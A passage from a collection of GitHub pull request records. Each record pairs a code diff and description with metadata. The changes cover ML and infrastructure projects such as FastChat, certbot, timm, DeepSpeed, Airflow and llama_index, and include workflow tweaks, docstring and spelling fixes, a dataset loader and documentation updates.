+ else:
+ all_embeddings.append(chunk_embeddings)
all_token_num += token_num
all_embeddings_tensor = torch.stack(all_embeddings)
| <!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
The current implementation of BGE is incorrect. Different from mean pooling, BGE uses the last hidden state of cls token as the sentence embedding. This PR adds a new attribute 'use_cls_pooling' to model adapter, and implements the cls pooling in model_worker.py
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number (if applicable)
<!-- For example: "Closes #1234" -->
## Checks
- [ ] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [x] I've made sure the relevant tests are passing (if applicable).
| https://api.github.com/repos/lm-sys/FastChat/pulls/2926 | 2024-01-17T03:34:03Z | 2024-01-24T07:58:26Z | 2024-01-24T07:58:26Z | 2024-01-24T07:58:26Z | 903 | lm-sys/FastChat | 41,682 |
Skip Mattermost Job for Forked Repos | diff --git a/.github/workflows/merged.yaml b/.github/workflows/merged.yaml
index d6dbe83c6e2..52f3e1bc4fd 100644
--- a/.github/workflows/merged.yaml
+++ b/.github/workflows/merged.yaml
@@ -7,7 +7,8 @@ on:
jobs:
if_merged:
- if: github.event.pull_request.merged == true
+ # Forked repos can not access Mattermost secret.
+ if: github.event.pull_request.merged == true && !github.event.pull_request.head.repo.fork
runs-on: ubuntu-latest
steps:
- name: Create Mattermost Message
| Reason: Forked Repos can't access Mattermost Secret to properly send message to channel.
Open to suggestions, the push event is very limited in scope when I checked [here](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#push).
| https://api.github.com/repos/certbot/certbot/pulls/9739 | 2023-07-24T19:14:06Z | 2023-07-24T20:12:28Z | 2023-07-24T20:12:28Z | 2023-07-24T20:12:34Z | 151 | certbot/certbot | 3,606 |
[doc build] Use secrets | diff --git a/.github/workflows/build_documentation.yml b/.github/workflows/build_documentation.yml
index 167b7d610b..b4ef7415c7 100644
--- a/.github/workflows/build_documentation.yml
+++ b/.github/workflows/build_documentation.yml
@@ -14,8 +14,8 @@ jobs:
commit_sha: ${{ github.sha }}
package: pytorch-image-models
package_name: timm
- repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
version_tag_suffix: ""
secrets:
- token: ${{ secrets.HUGGINGFACE_PUSH }}
\ No newline at end of file
+ token: ${{ secrets.HUGGINGFACE_PUSH }}
+ hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
\ No newline at end of file
diff --git a/.github/workflows/build_pr_documentation.yml b/.github/workflows/build_pr_documentation.yml
index 2b44619f69..058d06141f 100644
--- a/.github/workflows/build_pr_documentation.yml
+++ b/.github/workflows/build_pr_documentation.yml
@@ -15,6 +15,5 @@ jobs:
pr_number: ${{ github.event.number }}
package: pytorch-image-models
package_name: timm
- repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
version_tag_suffix: ""
diff --git a/.github/workflows/delete_doc_comment.yml b/.github/workflows/delete_doc_comment.yml
index c05e94c5fb..72801c856e 100644
--- a/.github/workflows/delete_doc_comment.yml
+++ b/.github/workflows/delete_doc_comment.yml
@@ -1,13 +1,13 @@
-name: Delete dev documentation
+name: Delete doc comment
on:
- pull_request:
- types: [ closed ]
-
+ workflow_run:
+ workflows: ["Delete doc comment trigger"]
+ types:
+ - completed
jobs:
delete:
uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
- with:
- pr_number: ${{ github.event.number }}
- package: timm
\ No newline at end of file
+ secrets:
+ comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
\ No newline at end of file
diff --git a/.github/workflows/delete_doc_comment_trigger.yml b/.github/workflows/delete_doc_comment_trigger.yml
new file mode 100644
index 0000000000..5e39e25397
--- /dev/null
+++ b/.github/workflows/delete_doc_comment_trigger.yml
@@ -0,0 +1,12 @@
+name: Delete doc comment trigger
+
+on:
+ pull_request:
+ types: [ closed ]
+
+
+jobs:
+ delete:
+ uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
+ with:
+ pr_number: ${{ github.event.number }}
\ No newline at end of file
diff --git a/.github/workflows/upload_pr_documentation.yml b/.github/workflows/upload_pr_documentation.yml
new file mode 100644
index 0000000000..237ae8eae4
--- /dev/null
+++ b/.github/workflows/upload_pr_documentation.yml
@@ -0,0 +1,16 @@
+name: Upload PR Documentation
+
+on:
+ workflow_run:
+ workflows: ["Build PR Documentation"]
+ types:
+ - completed
+
+jobs:
+ build:
+ uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
+ with:
+ package_name: timm
+ secrets:
+ hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
+ comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
\ No newline at end of file
| Companion pr to https://github.com/huggingface/doc-builder/pull/379
Please feel free to merge it yourself
cc: @nateraw @rwightman @LysandreJik | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1841 | 2023-06-09T08:47:40Z | 2023-06-09T14:04:07Z | 2023-06-09T14:04:06Z | 2023-06-09T14:04:07Z | 867 | huggingface/pytorch-image-models | 16,233 |
Fix docstrings in api.py | diff --git a/face_recognition/api.py b/face_recognition/api.py
index 9df9e6e6d..58cc48826 100644
--- a/face_recognition/api.py
+++ b/face_recognition/api.py
@@ -65,7 +65,7 @@ def face_distance(face_encodings, face_to_compare):
Given a list of face encodings, compare them to a known face encoding and get a euclidean distance
for each comparison face. The distance tells you how similar the faces are.
- :param faces: List of face encodings to compare
+ :param face_encodings: List of face encodings to compare
:param face_to_compare: A face encoding to compare against
:return: A numpy ndarray with the distance for each face in the same order as the 'faces' array
"""
@@ -125,7 +125,7 @@ def _raw_face_locations_batched(images, number_of_times_to_upsample=1, batch_siz
"""
Returns an 2d array of dlib rects of human faces in a image using the cnn face detector
- :param img: A list of images (each as a numpy array)
+ :param images: A list of images (each as a numpy array)
:param number_of_times_to_upsample: How many times to upsample the image looking for faces. Higher numbers find smaller faces.
:return: A list of dlib 'rect' objects of found face locations
"""
| Just a quickfix on some docstrings in the `face_recognition/api.py` file. | https://api.github.com/repos/ageitgey/face_recognition/pulls/1117 | 2020-04-19T14:53:08Z | 2020-09-26T14:42:34Z | 2020-09-26T14:42:34Z | 2020-09-26T14:42:34Z | 326 | ageitgey/face_recognition | 22,596 |
Add dataset loader for MegaCodeTraining112k & Evol-Instruct-Code-80k-v1 | diff --git a/model/model_training/custom_datasets/instruction.py b/model/model_training/custom_datasets/instruction.py
index c93fad81f1..c6b6acd8dd 100644
--- a/model/model_training/custom_datasets/instruction.py
+++ b/model/model_training/custom_datasets/instruction.py
@@ -1,6 +1,9 @@
"""
These are in the form of 'INSTRUCTION', 'RESPONSE'
"""
+import random
+from typing import Optional
+
from datasets import load_dataset
from model_training.custom_datasets.formatting import DatasetEntry, create_dataset_entry_qa
from model_training.custom_datasets.utils import _filter_by_words
@@ -25,40 +28,70 @@
"oa_stackexchange": "donfu/oa-stackexchange",
"tell_a_joke": "mikegarts/oa_tell_a_joke_20000",
"wizardlm_70k": "ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered",
+ "megacode": "rombodawg/MegaCodeTraining112k",
+ "evol_instruct_code": "nickrosh/Evol-Instruct-Code-80k-v1",
}
class InstructionDataset(Dataset):
- def __init__(self, dataset, cache_dir, split, mode="sft"):
+ def __init__(self, dataset, cache_dir, split, mode="sft", fill_min_length: Optional[int] = None, seed: int = 42):
assert mode in ("sft", "rl")
self.name = dataset
self.mode = mode
+ data_files = None
if dataset == "minimath":
self.instruction_column = "question"
self.response_column = "answer"
- elif dataset == "wizardlm_70k":
+ elif dataset in ("wizardlm_70k", "evol_instruct_code"):
self.instruction_column = "instruction"
self.response_column = "output"
+ elif dataset == "megacode":
+ self.instruction_column = "prompt"
+ self.response_column = "completion"
+ data_files = "RombosCodeTraining112k.json"
else:
self.instruction_column = "INSTRUCTION"
self.response_column = "RESPONSE"
- ds = load_dataset(INSTRUCTION_DATASETS[dataset], cache_dir=cache_dir, split=split)
- self.dataset = []
num_invalid = 0
- for i in range(len(ds)):
- data = ds[i]
+
+ ds = load_dataset(INSTRUCTION_DATASETS[dataset], cache_dir=cache_dir, split=split, data_files=data_files)
+ self.dataset: list[tuple[list[str], list[str]]] = []
+
+ questions, answers = [], []
+ item_len = 0
+
+ rng = random.Random(seed)
+ order = list(range(len(ds)))
+ rng.shuffle(order)
+
+ # filter entries and optionally combine multiple entries
+ for i in order:
+ entry = ds[i]
+ q = entry[self.instruction_column]
+ a = entry[self.response_column]
if (
- data[self.instruction_column] is not None
- and len(data[self.instruction_column].strip()) > 0
- and data[self.response_column] is not None
- and len(data[self.response_column].strip()) > 0
- and _filter_by_words(data[self.instruction_column])
- and _filter_by_words(data[self.response_column])
+ q is not None
+ and len(q.strip()) > 0
+ and a is not None
+ and len(a.strip()) > 0
+ and _filter_by_words(q)
+ and _filter_by_words(a)
):
- self.dataset.append(data)
+ questions.append(q)
+ answers.append(a)
+ item_len += len(a) + len(q)
+
+ if fill_min_length is None or fill_min_length < item_len:
+ self.dataset.append((questions, answers))
+ item_len = 0
+ questions, answers = [], []
else:
num_invalid += 1
+
+ if len(questions) > 0 and len(answers) > 0:
+ self.dataset.append((questions, answers))
+
if num_invalid > 0:
print(f"[Warning] {num_invalid} entries of {dataset} were invalid.")
@@ -66,8 +99,9 @@ def __len__(self):
return len(self.dataset)
def __getitem__(self, idx) -> DatasetEntry:
- data = self.dataset[idx]
- lang = None
+ questions, answers = self.dataset[idx]
+
+ lang: str | None = None
# use "en" for datasets which have more than 95% English messages
if self.name in [
"humaneval_mbpp_codegen_qa",
@@ -78,9 +112,10 @@ def __getitem__(self, idx) -> DatasetEntry:
"tell_a_joke",
]:
lang = "en"
+
return create_dataset_entry_qa(
mode=self.mode,
- questions=[data[self.instruction_column]],
- answers=[data[self.response_column]],
+ questions=questions,
+ answers=answers,
lang=lang,
)
diff --git a/model/pyproject.toml b/model/pyproject.toml
index bf5969aa67..a0e9931ba0 100644
--- a/model/pyproject.toml
+++ b/model/pyproject.toml
@@ -32,7 +32,7 @@ dependencies = [
"langcodes==3.3.0",
"tqdm>=4.65.0",
"pydantic==1.10.7",
- "transformers @ git+https://github.com/huggingface/transformers.git@e4a52b6a1536b1d9ef1ac55168bc4fede25605bc",
+ "transformers==4.31.0",
"wandb>=0.15.5",
]
| Added code to load `rombodawg/MegaCodeTraining112k` (key: megacode) and `nickrosh/Evol-Instruct-Code-80k-v1` (key: evol_instruct_code).
Also added an optional `fill_min_length` parameter to `InstructionDataset` class. If specified instructions are concatenate until the total string length of prompts and completions exceeds `fill_min_length`. Seed for random order can optionally be specified (default: 42).
Example:
```
datasets:
- megacode:
fill_min_length: 24000
- evol_instruct_code:
fill_min_length: 24000
```
- updated transformers dependency to `==4.31.0` | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3605 | 2023-07-25T18:47:38Z | 2023-07-25T19:20:13Z | 2023-07-25T19:20:13Z | 2023-07-25T19:20:14Z | 1,326 | LAION-AI/Open-Assistant | 37,302 |
Fix spelling errors in DeepSpeed codebase | diff --git a/deepspeed/autotuning/autotuner.py b/deepspeed/autotuning/autotuner.py
index 76cecd5dc5dd..5ff873c582fe 100755
--- a/deepspeed/autotuning/autotuner.py
+++ b/deepspeed/autotuning/autotuner.py
@@ -101,7 +101,7 @@ def __init__(self, args, active_resources):
self.records = {}
self.optimal_cmd = None
- self.optmal_ds_config = None
+ self.optimal_ds_config = None
self.mlflow_parent_id = None
@@ -1093,7 +1093,7 @@ def write_optimal_config(self):
fd.write("\n")
fd.flush()
self.optimal_cmd = cmd
- self.optmal_ds_config = ds_config
+ self.optimal_ds_config = ds_config
logger.info(
f"Wrote the optimal DeepSpeed configuration found by autotuning to {ds_config_path}, and the corresponding DeepSpeed command to {cmd_path}"
)
diff --git a/deepspeed/checkpoint/deepspeed_checkpoint.py b/deepspeed/checkpoint/deepspeed_checkpoint.py
index ef36b0c5ef3f..77634222d292 100644
--- a/deepspeed/checkpoint/deepspeed_checkpoint.py
+++ b/deepspeed/checkpoint/deepspeed_checkpoint.py
@@ -98,11 +98,11 @@ def show_tp_embedding_map(self):
def show_tp_final_norm_map(self):
self._dump_mapping(self.tp_to_final_norm_map, 'tp_to_final_norm_layers')
- def show_pp_tranformer_map(self):
- self._dump_mapping(self.pp_to_transformer_map, 'pp_to_tranformer_layers')
+ def show_pp_transformer_map(self):
+ self._dump_mapping(self.pp_to_transformer_map, 'pp_to_transformer_layers')
def show_transformer_file_map(self):
- self._dump_mapping(self.transformer_file_map, 'rank_to_tranformer_files')
+ self._dump_mapping(self.transformer_file_map, 'rank_to_transformer_files')
def _build_global_state(self):
sd = torch.load(self.mp_rank_files[0], map_location=torch.device('cpu'))
diff --git a/deepspeed/comm/comm.py b/deepspeed/comm/comm.py
index 913dcf84d681..2ae6b581a272 100644
--- a/deepspeed/comm/comm.py
+++ b/deepspeed/comm/comm.py
@@ -5,7 +5,7 @@
"""
DeepSpeed Communication Package: deepspeed.comm
deepspeed.comm
- -- import and use deepspeeed.ops.comm
+ -- import and use deepspeed.ops.comm
-- use torch.distributed directly if both this package and torch.distributed use the same NCCL version
-- use custom collectives
-- can either use torch.dist or ds.ops.comm?
diff --git a/deepspeed/compression/compress.py b/deepspeed/compression/compress.py
index 9c4632f8aef3..a047b5127eb1 100644
--- a/deepspeed/compression/compress.py
+++ b/deepspeed/compression/compress.py
@@ -191,7 +191,7 @@ def student_initialization(student_model, teacher_model, deepspeed_config):
The layer of teacher will be used for student's reinitializedion
Example 1: [1,3,5,7,9], means we want to matches the 2nd/4th/6th/8th/10th layer of teacher to the first 5 layers of student
student_layer (`list` or None)
- The layer of student need to be re-intiialized
+ The layer of student need to be re-initialized
Example 1: None, means we want to reinitialize all the layers
Example 1: [0,1,2,3,4], means we want to reinitialize the first 5 layers
other_module_name (`list of string`)
diff --git a/deepspeed/compression/helper.py b/deepspeed/compression/helper.py
index fdca916e9f15..b06f085b8e1c 100644
--- a/deepspeed/compression/helper.py
+++ b/deepspeed/compression/helper.py
@@ -176,13 +176,13 @@ def is_module_compressible(module, mpu=None):
return ret
-def compression_preparation(model, compression_techinique_list, mpu):
+def compression_preparation(model, compression_technique_list, mpu):
"""
Prepare the compression techniques of a model.
Args:
model (`torch.nn.Module`)
The model to prepare the compression techniques of.
- compression_techinique_list (`list`)
+ compression_technique_list (`list`)
The list of compression techniques to prepare the model to.
list[]
"""
@@ -190,7 +190,7 @@ def compression_preparation(model, compression_techinique_list, mpu):
for module_name, module in model.named_modules():
if is_module_compressible(module, mpu):
module_replacement(model, module_name, mpu=mpu)
- for module_name_lists, _, compression_technique in compression_techinique_list:
+ for module_name_lists, _, compression_technique in compression_technique_list:
for mnl in module_name_lists:
for module_name in mnl:
module_replacement(model, module_name, compression_technique)
diff --git a/deepspeed/compression/utils.py b/deepspeed/compression/utils.py
index 3534f994cd78..481e833bdf8c 100644
--- a/deepspeed/compression/utils.py
+++ b/deepspeed/compression/utils.py
@@ -72,7 +72,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int, >=4)
Number of bits to use for quantization
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization
num_groups (int)
How many groups to partition the quantization into
@@ -114,7 +114,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int, >=4)
Number of bits to use for quantization
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization
num_groups (int)
How many groups to partition the quantization into
@@ -158,7 +158,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int)
Dummy variable
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization; for now they are dummy variable
num_groups (int)
How many groups to partition the quantization into
@@ -199,7 +199,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int)
Dummy variable
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization; for now they are dummy variable
num_groups (int)
How many groups to partition the quantization into
diff --git a/deepspeed/elasticity/config.py b/deepspeed/elasticity/config.py
index 9c574d3537c8..7c6bd42cdfd9 100644
--- a/deepspeed/elasticity/config.py
+++ b/deepspeed/elasticity/config.py
@@ -84,7 +84,7 @@ def __init__(self, param_dict):
raise ElasticityConfigError("Elasticity min_gpus cannot be greater than max_gpus, "
f"given min_gpus: {self.min_gpus}, max_gpus: {self.max_gpus}")
- self.model_parallel_size = param_dict.get(MODEL_PARLLEL_SIZE, MODEL_PARLLEL_SIZE_DEFAULT)
+ self.model_parallel_size = param_dict.get(MODEL_PARALLEL_SIZE, MODEL_PARALLEL_SIZE_DEFAULT)
if self.model_parallel_size < 1:
raise ElasticityConfigError("Model-Parallel size cannot be less than 1, "
f"given model-parallel size: {self.model_parallel_size}")
diff --git a/deepspeed/elasticity/constants.py b/deepspeed/elasticity/constants.py
index 85a38c749b2a..b3134c54b4d6 100644
--- a/deepspeed/elasticity/constants.py
+++ b/deepspeed/elasticity/constants.py
@@ -50,8 +50,8 @@
NUM_GPUS_PER_NODE = 'num_gpus_per_node'
NUM_GPUS_PER_NODE_DEFAULT = 1
-MODEL_PARLLEL_SIZE = "model_parallel_size"
-MODEL_PARLLEL_SIZE_DEFAULT = 1
+MODEL_PARALLEL_SIZE = "model_parallel_size"
+MODEL_PARALLEL_SIZE_DEFAULT = 1
# Minimum running time (minutes) before the scheduler will scale us, 0 implies it's unknown
MIN_TIME = "min_time"
diff --git a/deepspeed/runtime/config.py b/deepspeed/runtime/config.py
index dd9d77b6a158..bc5511226565 100755
--- a/deepspeed/runtime/config.py
+++ b/deepspeed/runtime/config.py
@@ -46,8 +46,8 @@
ELASTICITY,
IGNORE_NON_ELASTIC_BATCH_INFO,
IGNORE_NON_ELASTIC_BATCH_INFO_DEFAULT,
- MODEL_PARLLEL_SIZE,
- MODEL_PARLLEL_SIZE_DEFAULT,
+ MODEL_PARALLEL_SIZE,
+ MODEL_PARALLEL_SIZE_DEFAULT,
NUM_GPUS_PER_NODE,
NUM_GPUS_PER_NODE_DEFAULT,
)
@@ -712,7 +712,7 @@ def __init__(self, config: Union[str, dict], mpu=None):
# Ensure the resource scheduler saw the same elastic config we are using at runtime
ensure_immutable_elastic_config(runtime_elastic_config_dict=elastic_dict)
- self.elastic_model_parallel_size = elastic_dict.get(MODEL_PARLLEL_SIZE, MODEL_PARLLEL_SIZE_DEFAULT)
+ self.elastic_model_parallel_size = elastic_dict.get(MODEL_PARALLEL_SIZE, MODEL_PARALLEL_SIZE_DEFAULT)
if self.elastic_model_parallel_size < 1:
raise ElasticityConfigError("Model-Parallel size cannot be less than 1, "
f"given model-parallel size: {self.elastic_model_parallel_size}")
| fix spelling error with deepspeed/
detail info:
modified: deepspeed/autotuning/autotuner.py
modified: deepspeed/checkpoint/deepspeed_checkpoint.py
modified: deepspeed/comm/comm.py
modified: deepspeed/compression/compress.py
modified: deepspeed/compression/helper.py
modified: deepspeed/compression/utils.py
modified: deepspeed/elasticity/config.py
modified: deepspeed/elasticity/constants.py
modified: deepspeed/runtime/config.py
@microsoft-github-policy-service agree | https://api.github.com/repos/microsoft/DeepSpeed/pulls/3494 | 2023-05-09T10:38:26Z | 2023-05-09T16:54:06Z | 2023-05-09T16:54:06Z | 2023-05-09T23:57:44Z | 2,407 | microsoft/DeepSpeed | 10,828 |
Fix trino hook tests: change int to enum | diff --git a/tests/providers/trino/hooks/test_trino.py b/tests/providers/trino/hooks/test_trino.py
index ac7a6d1a6c649..f17d7419e56da 100644
--- a/tests/providers/trino/hooks/test_trino.py
+++ b/tests/providers/trino/hooks/test_trino.py
@@ -36,7 +36,7 @@
TRINO_DBAPI_CONNECT = 'airflow.providers.trino.hooks.trino.trino.dbapi.connect'
-class TestTrinoHookConn(unittest.TestCase):
+class TestTrinoHookConn:
@patch(BASIC_AUTHENTICATION)
@patch(TRINO_DBAPI_CONNECT)
@patch(HOOK_GET_CONNECTION)
@@ -117,7 +117,7 @@ def assert_connection_called_with(mock_connect, auth=None, verify=True):
schema='hive',
source='airflow',
user='login',
- isolation_level=0,
+ isolation_level=IsolationLevel.AUTOCOMMIT,
auth=None if not auth else auth.return_value,
verify=verify,
)
| Trino hook tests were failing because the mock assert method now appears to use an Enum instead of int.
| https://api.github.com/repos/apache/airflow/pulls/20082 | 2021-12-06T18:37:04Z | 2021-12-06T19:34:00Z | 2021-12-06T19:34:00Z | 2022-02-14T21:46:37Z | 229 | apache/airflow | 14,107 |
Update description in docs/examples/managed/zcpDemo.ipynb | diff --git a/docs/community/integrations/managed_indices.md b/docs/community/integrations/managed_indices.md
index 2ec4d23ba4ba9..6e59e94c53598 100644
--- a/docs/community/integrations/managed_indices.md
+++ b/docs/community/integrations/managed_indices.md
@@ -105,11 +105,10 @@ maxdepth: 1
## Zilliz
-First, [sign up](https://cloud.zilliz.com/signup) or use existing Zilliz Cloud account to create a free Serverless Cluster. This is to get the cluster id and API key to grant access to Zilliz Cloud Pipelines service.
+First, set up your [Zilliz Cloud](https://cloud.zilliz.com/signup?utm_source=twitter&utm_medium=social%20&utm_campaign=2023-12-22_social_pipeline-llamaindex_twitter) account and create a free serverless cluster.
+Then copy the Cluster ID and API Key from your account.
-Then set the environment variables `ZILLIZ_CLUSTER_ID` and `ZILLIZ_TOKEN` by copying the value from the [Zilliz Cloud UI](https://raw.githubusercontent.com/milvus-io/bootcamp/2596ea9a4a1a089101a0b46e3cb012b8dfb2eb9a/images/zilliz_api_key_cluster_id.jpeg).
-
-Now you can construct the `ZillizCloudPipelineIndex` to ingest docs and query index as follows:
+Now you can construct `ZillizCloudPipelineIndex` to index docs and query as follows:
```python
import os
@@ -120,9 +119,9 @@ from llama_index.indices import ZillizCloudPipelineIndex
# Load documents from url and build document index
zcp_index = ZillizCloudPipelineIndex.from_document_url(
url="https://publicdataset.zillizcloud.com/milvus_doc.md",
- cluster_id=os.getenv("ZILLIZ_CLUSTER_ID"),
- token=os.getenv("ZILLIZ_TOKEN"),
- metadata={"version": "2.3"},
+ cluster_id="<YOUR_ZILLIZ_CLUSTER_ID>",
+ token="<YOUR_ZILLIZ_API_KEY>",
+ metadata={"version": "2.3"}, # optional
)
# Insert more docs into index, eg. a Milvus v2.2 document
@@ -143,6 +142,12 @@ query_engine_milvus23 = zcp_index.as_query_engine(
),
output_metadata=["version"],
)
+
+question = "Can users delete entities by complex boolean expressions?"
+# Retrieving
+retrieval_result = query_engine_with_filters.retrieve(question)
+# Querying
+answer = query_engine_with_filters.query(question)
```
```{toctree}
diff --git a/docs/examples/managed/zcpDemo.ipynb b/docs/examples/managed/zcpDemo.ipynb
index 7ed859e0847bf..77c89894bc40f 100644
--- a/docs/examples/managed/zcpDemo.ipynb
+++ b/docs/examples/managed/zcpDemo.ipynb
@@ -13,9 +13,9 @@
"id": "db0855d0",
"metadata": {},
"source": [
- "# Managed Index with Zilliz Cloud Pipeline\n",
+ "# Managed Index with Zilliz Cloud Pipelines\n",
"\n",
- "[Zilliz Cloud Pipelines](https://docs.zilliz.com/docs/pipelines) is a robust solution that efficiently transforms unstructured data into a vector database for effective semantic search.\n",
+ "[Zilliz Cloud Pipelines](https://docs.zilliz.com/docs/pipelines) is a scalable API service for retrieval. You can use Zilliz Cloud Pipelines as managed index in `llama-index`. This service can transform documents into vector embeddings and store them in Zilliz Cloud for effective semantic search.\n",
"\n",
"## Setup\n",
"\n",
@@ -37,7 +37,7 @@
"id": "3fc94b2f",
"metadata": {},
"source": [
- "2. Set your [OpenAI](https://platform.openai.com) & [Zilliz Cloud](https://cloud.zilliz.com/) accounts"
+ "2. Configure credentials of your [OpenAI](https://platform.openai.com) & [Zilliz Cloud](https://cloud.zilliz.com/signup?utm_source=twitter&utm_medium=social%20&utm_campaign=2023-12-22_social_pipeline-llamaindex_twitter) accounts."
]
},
{
@@ -53,7 +53,7 @@
"os.environ[\"OPENAI_API_KEY\"] = getpass(\"Enter your OpenAI API Key:\")\n",
"\n",
"ZILLIZ_CLUSTER_ID = getpass(\"Enter your Zilliz Cluster ID:\")\n",
- "ZILLIZ_TOKEN = getpass(\"Enter your Zilliz Token:\")"
+ "ZILLIZ_TOKEN = getpass(\"Enter your Zilliz API Key:\")"
]
},
{
@@ -65,7 +65,7 @@
"\n",
"### From Signed URL\n",
"\n",
- "Zilliz Cloud Pipeline is able to ingest & automatically index a document given a presigned url."
+ "Zilliz Cloud Pipelines accepts files from AWS S3 and Google Cloud Storage. You can generate a presigned url from the Object Storage and use `from_document_url()` or `insert_doc_url()` to ingest the file. It can automatically index the document and store the doc chunks as vectors on Zilliz Cloud."
]
},
{
@@ -78,10 +78,13 @@
"from llama_index.indices import ZillizCloudPipelineIndex\n",
"\n",
"zcp_index = ZillizCloudPipelineIndex.from_document_url(\n",
- " url=\"https://publicdataset.zillizcloud.com/milvus_doc.md\", # a public or pre-signed url of a file stored on s3 or gcs\n",
+ " # a public or pre-signed url of a file stored on AWS S3 or Google Cloud Storage\n",
+ " url=\"https://publicdataset.zillizcloud.com/milvus_doc.md\",\n",
" cluster_id=ZILLIZ_CLUSTER_ID,\n",
" token=ZILLIZ_TOKEN,\n",
- " metadata={\"version\": \"2.3\"},\n",
+ " # optional\n",
+ " metadata={\"version\": \"2.3\"}, # used for filtering\n",
+ " collection_name=\"zcp_llamalection\", # change this value will specify customized collection name\n",
")\n",
"\n",
"# Insert more docs, eg. a Milvus v2.2 document\n",
@@ -96,6 +99,8 @@
"id": "d16a498e",
"metadata": {},
"source": [
+ "- It is optional to add metadata for each document. The metadata can be used to filter doc chunks during retrieval.\n",
+ "\n",
"### From Local File\n",
"\n",
"Coming soon.\n",
@@ -112,13 +117,10 @@
"source": [
"## Working as Query Engine\n",
"\n",
- "A Zilliz Cloud Pipeline's Index can work as a Query Engine in LlamaIndex.\n",
- "It allows users to customize some parameters:\n",
- "- search_top_k: How many text nodes/chunks retrieved. Optional, defaults to `DEFAULT_SIMILARITY_TOP_K` (2).\n",
+ "To conduct semantic search with `ZillizCloudPipelineIndex`, you can use it `as_query_engine()` by specifying a few parameters:\n",
+ "- search_top_k: How many text nodes/chunks to retrieve. Optional, defaults to `DEFAULT_SIMILARITY_TOP_K` (2).\n",
"- filters: Metadata filters. Optional, defaults to None.\n",
- "- output_metadata: What metadata fields included in each retrieved text node. Optional, defaults to [].\n",
- "\n",
- "It is optional to apply filters. For example, if we want to ask about Milvus 2.3, then we can set version as 2.3 in filters."
+ "- output_metadata: What metadata fields to return with the retrieved text node. Optional, defaults to []."
]
},
{
@@ -128,13 +130,13 @@
"metadata": {},
"outputs": [],
"source": [
- "# # Get index without ingestion:\n",
+ "# # If you don't have zcp_index object and have an existing collection, you can construct it by:\n",
+ "#\n",
"# from llama_index.indices import ZillizCloudPipelineIndex\n",
- "\n",
"# zcp_index = ZillizCloudPipelineIndex(\n",
"# cluster_id=ZILLIZ_CLUSTER_ID,\n",
"# token=ZILLIZ_TOKEN,\n",
- "# # collection_name='zcp_llamalection'\n",
+ "# collection_name=\"zcp_llamalection\"\n",
"# )\n",
"\n",
"from llama_index.vector_stores.types import ExactMatchFilter, MetadataFilters\n",
@@ -157,7 +159,7 @@
"source": [
"Then the query engine is ready for Semantic Search or Retrieval Augmented Generation with Milvus 2.3 documents:\n",
"\n",
- "- **Retrieve** (Semantic search powered by Zilliz Cloud Pipeline's Index):"
+ "- **Retrieve** (Semantic search powered by Zilliz Cloud Pipelines):"
]
},
{
@@ -175,9 +177,7 @@
}
],
"source": [
- "question = \"Can users delete entities by filtering non-primary fields?\"\n",
- "retrieved_nodes = query_engine_milvus23.retrieve(question)\n",
- "print(retrieved_nodes)"
+ "> The query engine with filters retrieves only text nodes with \"version 2.3\" tag."
]
},
{
@@ -185,7 +185,7 @@
"id": "e91c5896",
"metadata": {},
"source": [
- "- **Query** (RAG powered by Zilliz Cloud Pipeline's Index & OpenAI's LLM):"
+ "- **Query** (RAG powered by Zilliz Cloud Pipelines as retriever and OpenAI's LLM):"
]
},
{
| # Description
Update description in docs/examples/managed/zcpDemo.ipynb
Fixes # (issue)
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
- [ ] Added new notebook (that tests end-to-end)
- [ ] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [ ] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [ ] I have added Google Colab support for the newly added notebooks.
- [ ] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] New and existing unit tests pass locally with my changes
- [ ] I ran `make format; make lint` to appease the lint gods
| https://api.github.com/repos/run-llama/llama_index/pulls/9840 | 2024-01-04T12:08:41Z | 2024-01-05T05:01:10Z | 2024-01-05T05:01:10Z | 2024-01-05T05:01:10Z | 2,328 | run-llama/llama_index | 6,284 |
Fix torch multi-GPU --device error | diff --git a/utils/torch_utils.py b/utils/torch_utils.py
index 6d3e6151d57..9908a6e7e96 100644
--- a/utils/torch_utils.py
+++ b/utils/torch_utils.py
@@ -75,13 +75,14 @@ def time_synchronized():
return time.time()
